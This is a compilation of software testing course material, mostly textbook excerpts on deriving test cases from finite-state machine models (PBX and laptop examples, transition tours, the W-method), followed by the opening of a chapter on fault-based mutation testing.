• Note that a transition does not need to change to a different state (although all of the transitions shown above do go to a different state). So there could be a transition from ‘access account’ which just goes back to ‘access account’ for an action such as ‘request balance’.

Test conditions can be derived from the state graph in various ways. Each state can be noted as a test condition, as can each transition. However this state diagram, even

http://istqbexamcertification.com/wp-content/uploads/2012/01/State-transition-example.jpg

though it is incomplete, still gives us information on which to design some useful tests and to explain the state transition technique.

We need to be able to identify the coverage of a set of tests in terms of transitions. We can also consider transition pairs and triples and so on. Coverage of all individual transitions is also known as 0-switch coverage, coverage of transition pairs is l-switch coverage, coverage of transition triples is 2-switch coverage, etc. Deriving test cases from the state transition model is a black-box approach. Measuring how much we have tested (covered) will discuss in a white-box perspective. However, state transition testing is regarded as a black-box technique.

Often the model is translated to or interpreted as a finite state automaton or a state transition system. This automaton represents the possible configurations of the system under test. To find test cases, the automaton is searched for executable paths. A possible execution path can serve as a test case. This method works if the model is deterministic or can be transformed into a deterministic one. Valuable off-nominal test cases may be obtained by leveraging unspecified transitions in these models.

Depending on the complexity of the system under test and the corresponding model the number of paths can be very large, because of the huge amount of possible configurations of the system. To find test cases that can cover an appropriate, but finite, number of paths, test criteria are needed to guide the selection. This technique was first proposed by Offutt and Abdurazik in the paper that started model-based testing. Multiple techniques for test case generation have been developed and are surveyed by Rushby. Test criteria are described in terms of general graphs in the testing textbook.

http://en.wikipedia.org/wiki/Finite_state_automaton

http://en.wikipedia.org/wiki/State_transition_system



http://en.wikipedia.org/wiki/Deterministic_system_%28mathematics%29

Test Generation from FSM Models

10.1 STATE-ORIENTED MODEL

Software systems can be broadly classified into two groups, namely, stateless andstate-oriented systems. The actions of a stateless system do not depend on theprevious inputs to the system. A compiler is an example of a stateless systembecause the result of compiling a program does not depend on the programs thathad been previously compiled. The response of the system to the present inputdepends on the past inputs to the system in a state-oriented system. A state-orientedsystem memorizes the sequence of inputs it has received so far in the form of astate. A telephone switching system is an example of a state-oriented system. Theinterpretation of digits by a telephone switch depends on the previous inputs, suchas a phone going off the hook, the sequence of digits dialed, and other the keyspressed.

A state-oriented system can be viewed as having a control portion and adata portion . The control portion specifies the sequences of interactions with itsenvironment, and the data portion specifies the data to be processed and saved.Depending on the characteristics of systems, a system can be predominantly dataoriented, be predominantly control oriented, or have a balanced mix of both dataand control, as illustrated in Figure 10.1.

In a data dominating system, the system spends most of its time processinguser requests, and the interaction sequences with the user are very simple. There-fore, the control portion is simpler compared to the data processing, which is morecomplex. This situation is depicted in Figure 10.2.


265

266 CHAPTER 10 TEST GENERATION FROM FSM MODELS

Statelesssystems

Softwaresystems

Data-dominatedsystems

Control-dominatedsystems

Partly data dominatedand partly controldominated systems

State-oriented systemsor

reactive systems

Figure 10.1 Spectrum of software systems.

Data

ControlUserinteractions

Figure 10.2 Data-dominated systems.

Example. A web browsing application is an example of data dominating systems.The system spends a significant amount of time in accessing remote data by makinghttp requests and formatting it for display. The system responds to each commandinput from the user, and there is not much state information that the system mustremember. A need for having state information is to perform the Back operation.Moreover, web browsing is not a time-dependent application, except for its depen-dence on the underlying Transmission Control Protocol/Internet Protocol (TCP/IP)operations.

In a control dominating system, the system performs complex (i.e., manytime-dependent and long-sequence) interactions with its user, while the amount ofdata being processed is relatively small. Therefore, the control portion is a large one,whereas the data processing functionality is very small. This situation is depictedin Figure 10.3.

Example. A telephone switching system is an example of a control dominatingsystem. The amount of user data processed is rather minimal. The data involved are

10.1 STATE-ORIENTED MODEL 267

Data

Userinteractions

Control

Figure 10.3 Control-dominatedsystems.

a mapping of phone numbers to equipment details, off- and on-hook events gener-ated by a user, phone number dialed, and possibly some other events representedby the push of other keys on a telephone.

The control portion of a software system can often be modeled as a finite-statemachine, (FSM), that is, the interactions between the system and its user or envi-ronment (Figures 10.2 and 10.3).

We have modeled the interactions of a user with a dual-boot laptop computer(Figure 10.4). Initially, the laptop is in the OFF state. When a user presses the

LINUX

BOOT

WIN

OFF

WSTND

LSTNDRESTART/ msg2

RESTART/ msg4

STANDBY/msg5

STANDBY/msg6

WAKEUP/msg7

WAKEUP/msg8

WINDOWS/ msg3

SHUTDOWN/ msg10

ON/msg0

SHUTDOWN/ msg9

LINUX/ msg1

Figure 10.4 FSM model of a dual-boot laptop computer.


power ON button, the system moves to the BOOT state, where it receives one oftwo inputs LINUX and WINDOWS. If the user input is LINUX, then the systemboots with the Linux operating system and moves to the LINUX state, whereas theWINDOWS input causes the system to boot with the Windows operating systemand moves to the WIN state. Whether the laptop is running Linux or Windows,the user can put the machine in standby states. The standby state for the Linuxmode is LSTND and for the Windows mode it is WSTND. The computer can bebrought back to its operating state LINUX or WIN from a standby state LSTND orWSTND, respectively, with a WAKEUP input. The laptop can be moved betweenLINUX and WIN states using RESTART inputs. The laptop can be shut downusing the SHUTDOWN input while it is in the LINUX or WIN state. The laptopcan also be brought to the OFF state by using the power button, but we have notshown these transitions in Figure 10.4.

The reader may note that for the purpose of generating test cases we do notconsider the internal behavior of a system; instead we assume that the externalbehavior of the system has been modeled as an FSM. To be more precise, theinteractions of a system with its environment is modeled as an FSM, as illustratedin Figure 10.5.

Now we can make a correspondence between Figures 10.5 and 10.4. Thesoftware system block in Figure 10.5 can be viewed as the boot software runningon a laptop, and the environment block in Figure 10.5 can be viewed as a user.The FSM shown in Figure 10.4 models the interactions shown by the bidirectionalarrows in Figure 10.5.

An FSM model of the external behavior of a system describes the sequencesof input to and expected output from the system. Such a model is a prime sourceof test cases. In this chapter, we explain how to derive test cases from an FSMmodel.

Softwaresystem

Environment

Interactions

Figure 10.5 Interactions betweensystem and its environment modeledas FSM.

10.2 POINTS OF CONTROL AND OBSERVATION 269

10.2 POINTS OF CONTROL AND OBSERVATION

A point of control and observation (PCO) is a well-designated point of interac-tion between a system and its users . We use the term users in a broad sense toinclude all entities, including human users and other software and hardware sys-tems, lying outside but interacting with the system under consideration. PCOs havethe following characteristics:

• A PCO represents a point where a system receives input from its usersand/or produces output for the users.

• There may be multiple PCOs between a system and its users.

• Even if a system under test (SUT) is a software system, for a human usera PCO may be “nearer” to the user than to the software under test. Forexample, a user may interact with a system via a push button, a touchscreen, and so on. We want to emphasize that even if we have a softwareSUT, we may not have a keyboard and a monitor for interacting with thesystem.

• In case a PCO is a physical entity , such as a push button, a keyboard, or aspeaker, there is a need to find their computer representations so that testcases can be automatically executed.

Example. Assume that we have a software system controlling a telephone switchPBX to provide connections between users. The SUT and the users interact viathe different subsystems of a telephone. We show the user–interface details of abasic telephone to explain the concept of a PCO (Figure 10.6) and summarize thosedetails in Table 10.1.

1

4

7

*

2 3

5 6

8 9

0 #

To anexchange

SpeakerPCO for tone andvoice output

MouthpiecePCO for voice input

HookPCO for on and off hook inputs

KeypadPCO for dialing

Ring indicatorPCO for phone ringing

Figure 10.6 PCOs on a telephone.


TABLE 10.1 PCOs for Testing Telephone PBX

In/Out View

PCO of System Description

Hook In The system receives off-hook and on-hook events.

Keypad In The caller dials a number and provides other control input.

Ring indicator Out The callee receives ring indication.

Speaker Out The caller receives tones (dial, fast busy, slow busy, etc.)and voice.

Mouthpiece In The caller produces voice input.

1

4

7

*

2 3

5 6

8 9

0 #

1

4

7

*

2 3

5 6

8 9

0 #

PBXRemote phone

(RP)Local phone

(LP)

Figure 10.7 FSM model of a PBX.

The reader may notice that even for a simple device such as a telephone wehave five distinct PCOs via which a user interacts with the switching software. Inreal life, users interact with the switching software via these distinct PCOs, andautomated test execution systems must recognize those distinct PCOs. However, tomake our discussion of test case generation from FSM models simple, clear, andconcise, we use fewer PCOs. We designate all the PCOs on a local phone by LPand all the PCOs on a remote phone by RP (Figure 10.7).

10.3 FINITE-STATE MACHINE

A FSM M is defined as a tuple as follows: M = <S, I, O, s0, δ, λ>, where

S is a set of states,

I is a set of inputs,

O is a set of outputs,

10.3 FINITE-STATE MACHINE 271

s0 is the initial state,

δ : S × I → S is a next-state function, and

λ : S × I → O is an output function.

Note the following points related to inputs and outputs because of the impor-tance of the concept of observation in testing a system:

• Identify the inputs and the outputs which are observed by explicitly spec-ifying a set of PCOs. For each state transition, specify the PCO at whichthe input occurs and the output is observed.

• There may be many outputs occurring at different PCOs for a single inputin a state.

An FSM specification of the interactions between a user and a PBX system isshown in Figure 10.8. The FSM has nine distinct states as explained in Table 10.2.

LP: NOI/LP: FBT

LP: #1/ LP: RT,RP: RING

AD

SB

TK

OH

RNG

OH

LP: OFH/ LP: DT

LP: #2/ LP: SBT

LP: NOI/ LP: FBT

RP: OFH/ LP: IT, RP: IT

LP: OFH/ LP: IT LP: NOI/ LP: DT

LP: NOI/ LP: IT

LON

RON IAF

FB

LP: ONH/ -

LP: ONH/ -

LP: ONH/ -

RP: OFH/ -

LP: ONH/ RP: IT

RP: ONH/ -LP: ONH/ -

LP: ONH/ -

LP: NOI/ -

RP: ONH/ LP: IT

LP: ONH/ -

RP: NOI/ FBT

Figure 10.8 FSM model of PBX.


TABLE 10.2 Set of States in FSM of Figure 10.8

Abbreviation Expanded Form Meaning

OH On hook A phone is on hook.

AD Add digit The user is dialing a number.

SB Slow busy The system has produced a slow busy tone.

FB Slow busy The system has produced a fast busy tone.

RNG Ring The remote phone is ringing.

TK Talk A connection is established.

LON Local on hook The local phone is on hook.

RON Remote on hook The remote phone is on hook.

IAF Idle after Fast busy The local phone is idle after a fast busy.

TABLE 10.3 Input and Output Sets in FSM of Figure 10.8

Input Output

OFH: Off hook DT: Dial tone

ONH: On hook RING: Phone ringing

#1: Valid phone number RT: Ring tone

#2: Invalid phone number SBT: Slow busy tone

NOI: No input FBT: Fast busy tone

IT: Idle tone

—: Don’t care

The initial state of the FSM is OH, which appears twice in Figure 10.8, becausewe wanted to avoid drawing transition lines from states LON, RON, and IAF backto the first occurrence of OH at the top.

There are five distinct input symbols (Table 10.3) accepted by the FSM. NOIrepresents user inaction; that is, the user never provides an input in a certain state.We have introduced the concept of an explicit NOI because we want to describe thebehavior of a system without introducing internal events, such as timeouts. Thereare seven output symbols, one of which denotes a don’t care output. A don’t careoutput is an absence of output or an arbitrary output which is ignored by the user.

There are two abstract PCOs used in the FSM of Figure 10.8. These arecalled LP and RP to represent a local phone used by a caller and a remote phonerepresented by the callee, respectively. We call LP and RP abstract PCOs becauseeach LP and RP represents five real, distinct PCOs, as explained in Section 10.2.

The input and output parts of a state transition are represented as follows:

PCOi : a

PCOj : b

10.5 TRANSITION TOUR METHOD 273

where input a occurs at PCOi and output b occurs at PCOj . If a state transitionproduces multiple outputs, we use the notation

PCOi : a

{PCOj : b, PCOk : c}

where input a occurs at PCOi , output b occurs at PCOj , and output c occurs atPCOk . We will represent a complete transition using the following syntax:

<present state, input, output, next state> or <present state, input/output, nextstate>

The state transition <OH, LP: OFH, LP: DT, AD> means that if the FSM is instate OH and receives input OFH (off hook) at port (PCO) LP, it produces outputDT (dial tone) at the same port LP and moves to state AD (Figure 10.8).

10.4 TEST GENERATION FROM AN FSM

Given an FSM model M of the requirements of a system and an implementationIM of M , the immediate testing task is to confirm that the implementation IM

behaves as prescribed by M . The testing process that verifies that an implementa-tion conforms to its specification is called conformance testing . The basic idea inconformance testing is summarized as follows:

• Obtain sequences of state transitions from M .

• Turn each sequence of a state transition into a test sequence.

• Test IM with a set of test sequences and observe whether or not IM pos-sesses the corresponding sequences of state transitions.

• The conformance of IM with M can be verified by carefully choosingenough state transition sequences from M .

In the following sections, first, we explain the ways to turn a state transitionsequence into a test sequence. Next, we explain the process of selecting differentstate transition sequences.

10.6 TESTING WITH STATE VERIFICATION

There are two functions associated with a state transition, namely, an output func-tion (λ) and a next-state function (δ). Test cases generated using the transition tourmethod discussed in Section 10.5 focused on the outputs. Now we discuss a method


sj

sk

si

s0

Initial state

Transfer sequence

State transition under test

Reset sequence

a/b

State verification sequenceFigure 10.11 Conceptual model of testcase with state verification.

for generating test cases by putting emphasis on both the output and the next stateof every state transition of an FSM. It is easy to verify outputs since they appear atPCOs, which are external to a system under test. However, verification of the nextstate of a state transition is not an easy task because the concept of state is purelyinternal to a SUT. The next state of a state transition is verified by applying furtherinputs to an SUT and observing its response at the PCOs. A conceptual model of amethod to generate test cases from an FSM with both output and state verificationsis illustrated in Figure 10.11. The five steps of the method are explained in thefollowing. The method is explained from the standpoint of testing a state transitionfrom state si to sj with input a.

Methodology for Testing with State Verification

Step 1: Assuming that the FSM is in its initial state, move the FSM from theinitial state s0 to state si by applying a sequence of inputs called a transfersequence denoted by T (si). It may be noted that different states will havedifferent transfer sequences, that is, T (si) �= T (sj ) for i �= j . For state si ,T (si) can be obtained from the FSM. At the end of this step, the FSM isin state si .

Step 2: In this step we apply input a to the SUT and observe its actual output,which is compared with the expected output b of the FSM. At the endof this step, a correctly implemented state transition takes the SUT to itsnew state sj . However, a faulty implementation can potentially take itto a state different from sj . The new state of the SUT is verified in thefollowing step.

Step 3: Apply a verification sequence VERj to the SUT and observe the cor-responding output sequence. An important property of VERj is thatλ(sj , VERj ) �= λ(s�, VERj ) ∀s� and s� �= sj . At the end of this step, theSUT is in state sk .

Step 4: Move the SUT back to the initial state s0 by applying a reset sequence RI.It is assumed that an SUT has correctly implemented a reset mechanism.

Step 5: Repeat steps 1–4 for all state transitions in the given FSM.

10.7 UNIQUE INPUT–OUTPUT SEQUENCE 279

For a selected transition from state si to state sj with input a, the above foursteps induce a transition tour defined by the input sequence T (si)@a@VERj @RIapplied to the system in its initial state s0. The symbol ‘@’ represents concatenationof two sequences. Applying the test design principles discussed in Section 10.5,one can derive a test case from such transition tours. Identifying a transfer sequenceT (si) out of the input sequence T (si)@a@VERj @RI for state si is a straightfor-ward task. However, it is not trivial to verify the next state of an implementation.There are three kinds of commonly used input sequences to verify the next stateof a SUT. These input sequences are as follows:

• Unique input–output sequence

• Distinguishing sequence

• Characterizing sequence

In the following sections, we explain the meanings of the three kinds of inputsequences and the ways to generate those kinds of sequences.

10.9 CHARACTERIZING SEQUENCE

It is still possible to determine uniquely the state of an FSM for FSMs whichdo not possess a DS. The FSM shown in Figure 10.17 does not have a DSbecause there is no singleton state block in the DS tree, as shown in Figure 10.18.The W-method was introduced for FSMs that do not possess a DS [9, 10]. Acharacterizing set of a state si is a set of input sequences such that, when eachsequence is applied to the implementation at state si , the set of output sequencesgenerated by the implementation uniquely identifies state si . Each sequence ofthe characterizing set of state si distinguishes state si from a group of states.Therefore, applying all of the sequences in the characterizing set distinguishesstate si from all other state. For an FSM-based specification, a set that consistsof characterizing sets of every state is called the W -set = {W1, W2, . . . , Wp} ofthe FSM. The members of the W -set are called characterizing sequences of thegiven FSM.

The basic test procedure for testing a state transition (si, sj , a/b) using theW -method follows.

A

B

D

C

b/y b/y

b/y

b/y

a/y

a/ya/x

a/y

Initial state Figure 10.17 FSM that does not possessdistinguishing sequence. (From ref. 11. © 1994IEEE.)


(ABCD)

(AA)(CB )

(AA)(BC )

(AA)(C )(A)

(AA)(A)(C )

(CC )(AA) (AA)(BD )

(CC )(B )(A)(DD)(AB)

(BB )(DA)

(AA)(CB )

(AA)(BD) (BB)(CD)

(DD)(CA)

(ABCD )

b

b

b

a

a

a

a b a

a

b

b

a bFigure 10.18 DS tree for FSM(Figure 10.17).

Testing Transition (si , sj , a/b) Using W-Method Repeat the following stepsfor each input sequence of the W -set:

Step 1: Assuming that the SUT is in its initial state, bring the SUT from itsinitial state s0 to state si by applying a transfer sequence T (si) as shownin Figure 10.11.

Step 2: Apply the input a and verify that the SUT generates the output b.

Step 3: Apply a verification sequence from the W -set to the SUT and verify thatthe corresponding output sequence is as expected. Assume that the SUTis in state sk at the end of this step.

Step 4: Move the SUT back to the initial state s0 by applying a reset sequenceRI in state sk.

Example: Characterizing Sequences. Consider the FSM specificationM = <S, I, O, A, δ, λ>, shown in Figure 10.17, where S = {A, B, C, D} is theset of states, I = {a, b} is the set of inputs, O = {x, y} is the set of outputs, A isthe initial state, δ : ×I → S is the next-state function, and λ : S × I → O is theoutput function. Kohavi [9] used multiple experiments to construct the W -set forthis FSM. Consider the input sequence W1 = aba. The output sequences generatedby W1 for each state of the FSM are shown in Table 10.10. The output sequencegenerated by the input sequence W1 can identify whether the state of an SUT waseither B or C before W1 is applied. This is because state B leads to the outputsequence yyy, whereas state C leads to the output sequence yyx. However, W1

cannot identify the state of an SUT if the FSM is in A or D because the outputsequences are xyx for both states, as shown in Table 10.10.

Now let us examine the response of the SUT to the input sequence W2 =ba for each state. The output sequences generated by W2 for each state of the

10.9 CHARACTERIZING SEQUENCE 289

TABLE 10.10 Output Sequences Generated byFSM of Figure 10.17 as Response to W1

Starting States Output Generated by W1 = aba

A xyx

B yyy

C yyx

D xyx

TABLE 10.11 Output Sequences Generated byFSM of Figure 10.17 as Response to W2

Starting States Output Generated by W2 = ba

A yx

B yx

C yy

D yy

FSM are shown in Table 10.11. The FSM implementation generates distinct outputsequences as a response to W2 if an SUT was at A or D, as shown in Table 10.11.This is because states A and D lead to distinct output sequences yx and yy,respectively. Therefore, the W -set for the FSM consists of two input sequences:W -set = {W1, W2}, where W1 = aba and W2 = ba. The transfer sequences for allthe states are T (B) = bb, T (C) = ba, and T (D) = b. The reset input sequenceis RI = bababa. The input sequence for testing the state transition (D, A, a/x)is given in Table 10.12. In Table 10.12, the columns labeled “message to SUT”and “message from SUT” represent the input message sent to the SUT and theexpected output message generated by the SUT, respectively. The current state andthe expected next state of the SUT are shown in the columns labeled “current state”and “next state,” respectively. During testing, the inputs are applied to the SUTin the order denoted by the column “step.” In the first step a transfer sequenceis applied to bring the SUT to state D. In step 2, the transition is tested. ThenW1 = aba is applied to verify the state (steps 3, 4, and 5). At this point, thestate transition is only partially tested, since W1 is not enough to identify the stateof an implementation. The reset sequence RI = bababa (steps 6–11) is appliedfollowed by the transfer sequence of T (D) = b (step 12) to bring the SUT intothe initial state and into state D, respectively. The test is repeated for the sametransition by using W2 = ba (steps 13–21). If all the outputs received from theSUT are defined by the FSM, the state transition test is completed successfully. Ifthe output of the SUT is not the expected response at any step, an error is detectedin the SUT.


TABLE 10.12 Test Sequences for State Transition (D, A, a/x ) of FSM in Figure 10.17

Step Current State Next State Message to SUT Message from SUT

Apply T (D)

1 A D b y

Test Transition (D, A, a/x)

2 D A a x

Apply W1

3 A A a x

4 A D b y

5 D A a x

Apply RI

6 A D b y

7 D A a x

8 A D b y

9 D A a x

10 A D b y

11 D A a x

Apply T (D)

12 A D b y

Test Transition (D, A, a/x)

13 D A a x

Apply W2

14 A D b y

15 D A a x

Apply RI

16 A D b y

17 D A a x

18 A D b y

19 D A a x

20 A D b y

21 D A a x


Four major methods— transition tours, distinguishing sequences, character-izing sequences, and unique input–output sequences —are discussed for the gen-eration of tests from an FSM. A question that naturally comes to mind is theeffectiveness of these techniques, that is, the types of discrepancies detected byeach of these methods. Sidhu and Leung [12] present a fault model based on theMonte Carlo simulation technique for estimating the fault coverage of the abovefour test generation methods. The authors introduced 10 different classes of ran-domly faulty specification, each obtained by random altering a given specification.For example, class I faults consist of randomly altering an output operation ina given specification. The authors conclude that all four methods, except for thetransition tour method, can detect all single faults as opposed to several faults

10.10 TEST ARCHITECTURES 291

introduced in a given specification. In addition, it is also shown that distinguish-ing, characterizing, and UIO sequences have the same fault detection capability.Another study, similar to the one by Sidhu and Leung, is reported by Dahbura andSabnani for the UIO sequence method [13].

10.5 TRANSITION TOUR METHOD

In this section, we discuss a process to generate a test sequence or test case Tc

from a state transition sequence St of a given FSM M . Specifically, we considertransition tours , where a transition tour is a sequence of state transitions beginningand ending at the initial state. Naito and Tsunoyama [1] introduced the transitiontour method for generating test cases from FSM specifications of sequential circuits.Sarikaya and Bochmann [2] were the first to observe that the transition tour methodcan be applied to protocol testing. An example of a transition tour obtained from

Transition coverage


SUT

PCO 1

PCO 2

(Test sequence)Test system

Figure 10.9 Interaction of test sequence with SUT.

Figure 10.8 is as follows: <OH, LP: OFH, LP: DT, AD>, <AD, LP: ONH, LP:—, OH>. One can easily identify the state, input , and expected output componentsin the sequence of Figure 10.8. However, it may be noted that a test case is notmerely a sequence of pairs of <input, expected output>, but rather a complete testcase must contain additional behavior such that it can be executed autonomouslyeven if the SUT contains faults. A test system interacting with a SUT is shown inFigure 10.9. A test system consists of a set of test cases and a test case scheduler .The scheduler decides the test case to be executed next depending on the testcase dependency constraints specified by a test designer. A test case in executionproduces inputs for the SUT and receives outputs from the SUT. It is obvious that afaulty SUT may produce an output which is different from the expected output, andsometimes it may not produce any output at all. Therefore, the test system mustbe able to handle these exceptional cases in addition to the normal cases. Thisidea leads us to the following formalization of a process for designing a completetest case:

• A test case contains a sequence of input and expected output data. Thisinformation is derived from the FSM specification of the SUT.

• A test case must be prepared to receive unexpected outputs from the SUT.

• A test case must not wait indefinitely to receive an output—expected orunexpected.

Example: Transition Tour. Let us derive a test case from the state transitionsequence <OH, LP: OFH, LP: DT, AD>, <AD, LP: ONH, LP: —, OH>. It isuseful to refer to a PCO of Figure 10.9, which explains an input–output relation-ship between the test system and a SUT. A sequence of inputs to the SUT can beobtained from its FSM model. For instance, the state transition sequence containsthe input sequence {OFH, ONH}. Therefore, the test system must produce an out-put sequence {OFH, ONH} for the SUT. Therefore, an input in a state transitionsequence of an FSM is an output of the test system at the same PCO. An outputis represented by prefixing an exclamation mark (‘!’) to an event (or message)

10.5 TRANSITION TOUR METHOD 275

1 LP !OFH2 START(TIMER1, d1)3 LP ?DT PASS4 CANCEL(TIMER1)5 LP !ONH6 LP ?OTHERWISE FAIL7 CANCEL(TIMER1)8 LP !ONH9 ?TIMER1 FAIL10 CANCEL(TIMER1)11 LP !ONH

Figure 10.10 Derived test case from transition tour.

in Figure 10.10. In line 1 of Figure 10.10, LP !OFH means that the test systemoutputs an event OFH at PCO LP.

An output produced in a state transition of an FMS M is interpreted as anexpected output of an implementation IM . Sometimes a faulty implementation mayproduce unexpected outputs. An output of an SUT becomes an input to the testsystem. Therefore, an output in a state transition sequence of an FSM is an inputto the test system at the same PCO. In Figure 10.10, an input is represented byprefixing a question mark (‘?’) to an event (or message). Therefore, in line 3 ofFigure 10.10, LP ?DT means that the test system is ready to receive the input DTat PCO LP.

Here the test system expects to receive an input DT at PCO LP, which hasbeen specified as LP ?DT. However, a faulty SUT may produce an unexpected out-put instead of the expected output DT at PCO LP. In line 6, the test system is readyto receive any event other than a DT at PCO LP. The reader may notice that LP?DT in line 3 and LP ?OTHERWISE in line 6 appear at the same level of indenta-tion and both lines have the same immediate predecessor action START(TIMER1,d1) in line 2.

If an SUT fails to produce any output—expected or unexpected—then thetest system and the SUT will be deadlocked, which is prevented by including atimeout mechanism in the test system. Before a test system starts to wait for aninput, it starts a timer of certain duration as shown in line 2. The name of the timeris TIMER1 in line 2, and its timeout duration is d1. If the SUT fails to producethe expected output DT or any other output within an interval of d1 after receivinginput OFH at PCO LP, the test system will produce an internal timeout event calledTIMER1, which will be received in line 9. One of the events specified in lines 3,6, and 9 eventually occurs. This means that the test system is not deadlocked inthe presence of a faulty SUT.

Coverage Metrics for Selecting Transition Tours. One can design one test casefrom one transition tour. One transition tour may not be sufficient to cover anentire FSM, unless it is a long one. Considering the imperative to simplify testdesign and to test just a small portion of an implementation with one test case,


there is a need to design many test cases. A perpetual question is: How many testcases should one design? Therefore, there is a need to identify several transitiontours from an FSM. The concept of coverage metrics is used in selecting a set oftransition tours. In order to test FSM-based implementations, two commonly usedcoverage metrics are:

• State coverage

• Transition coverage

Transition Tours for State Coverage. We select a set of transition tours so thatevery state of an FSM is visited at least once to achieve this coverage criterion.We have identified three transition tours, as shown in Table 10.4, to cover all thestates of the FSM shown in Figure 10.8. One can easily obtain test sequences fromthe three transition tours in Table 10.4 following the design principles explainedin Section 10.5 to transform a transition tour into a test sequence. State coverageis the weakest among all the selection criteria used to generate test sequencesfrom FSMs. The three transition tours shown in Table 10.4 cover every state ofthe FSM shown in Figure 10.8 at least once. However, of the 21 state transitions,only 11 are covered by the three transition tours. The 10 state transitions whichhave not been covered by those three transition tours are listed in Table 10.5.We next consider a stronger form of coverage criterion, namely, transitioncoverage.

Transition Tours for Transition Coverage. We select a set of transition toursso that every state transition of an FSM is visited at least once to achieve thiscoverage criterion. We have identified nine transition tours, as shown in Table 10.6,to cover all the state transitions of the FSM shown in Figure 10.8. One can easilyobtain test sequences from the nine transition tours in Table 10.6 following thedesign principles explained in Section 10.5 to transform a transition tour into a testsequence.

TABLE 10.4 Transition Tours Covering All States in Figure 10.8

Serial Number Transition Tours States Visited

1 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#2/LP:SBT,SB>; <SB, LP:NOI/LP:FBT, FB>; <FB,LP:NOI/LP:IT, IAF>; <IAF, LP:ONH/—, OH>

OH, AD, SB, FB, IAF

2 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT,RP:RING}, RNG>; <RNG, RP:OFH/{LP:IT, RP:IT},TK>; <TK, LP:ONH/RP:IT, LON>; <LON,LP:NOI/—, OH>

OH, AD, RNG, TK, LON

3 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT,RP:RING}, RNG>; <RNG, RP:OFH/{LP:IT, RP:IT},TK>; <TK, RP:ONH/LP:IT, RON>; <RON,LP:ONH/—, OH>

OH, AD, RNG, TK, RON

10.6 TESTING WITH STATE VERIFICATION 277

TABLE 10.5 State Transitions NotCovered by Transition Tours of Table 10.4

Serial Number State Transitions

1 <AD, LP:ONH/—, OH>

2 <AD, LP:NOI/LP:FBT, FB>

3 <SB, LP:ONH/—, OH>

4 <FB, LP:ONH/—, OH>

5 <LON, LP:OFH/LP:IT, TK>

6 <LON, RP:ONH/—, OH>

7 <RON, RP:OFH/—, TK>

8 <RON, LP:NOI/LP:DT, AD>

9 <RNG, LP:ONH/—, OH>

10 <RNG, RP:NOI/FBT, FB>

TABLE 10.6 Transition Tours Covering All State Transitions in Figure 10.8

SerialNumber Transition Tours

1 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#2/LP:SBT, SB>; <SB, LP:NOI/LP:FBT,FB>; <FB, LP:NOI/LP:IT, IAF>; <IAF, LP:ONH/—, OH>

2 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/\{LP:RT, RP:RING\}, RNG>; <RNG,RP:OFH/{LP:IT, RP:IT}, TK>; <TK, LP:ONH/RP:IT, LON>; <LON,LP:NOI/—, OH>

3 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG,RP:OFH/{LP:IT, RP:IT}, TK>; <TK, RP:ONH/LP:IT, RON>; <RON,LP:ONH/—, OH>

4 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#2/LP:SBT, SB>; <SB, LP:ONH/—,OH>;

5 <OH, LP:OFH/LP:DT, AD>; <AD, LP:NOI/LP:FBT, FB>; <FB, LP:ONH/—,OH>

6 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG,RP:OFH/{LP:IT, RP:IT}, TK>; <TK, LP:ONH/RP:IT, LON>; <LON,LP:OFH/LP:IT, TK>; <TK, RP:ONH/LP:IT, RON>; <RON, RP:OFH/—,TK>; <TK, LP:ONH/RP:IT, LON>; <LON, LP:NOI/—, OH>

7 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG,RP:OFH/{LP:IT, RP:IT}, TK>; <TK, RP:ONH/LP:IT, RON>; <RON,LP:NOI/LP:DT, AD>; <AD, LP:ONH/LP:DT, OH>

8 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG,LP:ONH/—, OH>

9 <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG,RP:NOI/FBT, FB>; <FB, LP:ONH/—, OH>

Fault based testing – Mutation analysis

Fault-Based Testing

A model of potential program faults is a valuable source of information for evaluating and designing test suites. Some fault knowledge is commonly used in functional and structural testing, for example when identifying singleton and error values for parameter characteristics in category-partition testing or when populating catalogs with erroneous values, but a fault model can also be used more directly. Fault-based testing uses a fault model directly to hypothesize potential faults in a program under test, as well as to create or evaluate test suites based on its efficacy in detecting those hypothetical faults.

16.1 Overview

Engineers study failures to understand how to prevent similar failures in the future. For example, failure of the Tacoma Narrows Bridge in 1940 led to new understanding of oscillation in high wind and to the introduction of analyses to predict and prevent such destructive oscillation in subsequent bridge design. The causes of an airliner crash are likewise extensively studied, and when traced to a structural failure they frequently result in a directive to apply diagnostic tests to all aircraft considered potentially vulnerable to similar failures.

Experience with common software faults sometimes leads to improvements in design methods and programming languages. For example, the main purpose of automatic memory management in Java is not to spare the programmer the trouble of releasing unused memory, but to prevent the programmer from making the kind of memory management errors (dangling pointers, redundant deallocations, and memory leaks) that frequently occur in C and C++ programs. Automatic array bounds checking cannot prevent a programmer from using an index expression outside array bounds, but can make it much less likely that the fault escapes detection in testing, as well as limiting the damage incurred if it does lead to operational failure (eliminating, in particular, the buffer overflow attack as a means of subverting privileged programs). Type checking reliably detects many other faults during program translation.

Of course, not all programmer errors fall into classes that can be prevented or statically detected using better programming languages. Some faults must be detected through testing, and there too we can use knowledge about common faults to be more effective.

The basic concept of fault-based testing is to select test cases that would distinguish the program under test from alternative programs that contain hypothetical faults. This is usually approached by modifying the program under test to actually produce the hypothetical faulty programs. Fault seeding can be used to evaluate the thoroughness of a test suite (that is, as an element of a test adequacy criterion), or for selecting test cases to augment a test suite, or to estimate the number of faults in a program.

16.2 Assumptions in Fault-Based Testing

The effectiveness of fault-based testing depends on the quality of the fault model and on some basic assumptions about the relation of the seeded faults to faults that might actually be present. In practice, the seeded faults are small syntactic changes, like replacing one variable reference by another in an expression, or changing a comparison from < to <=. We may hypothesize that these are representative of faults actually present in the program.

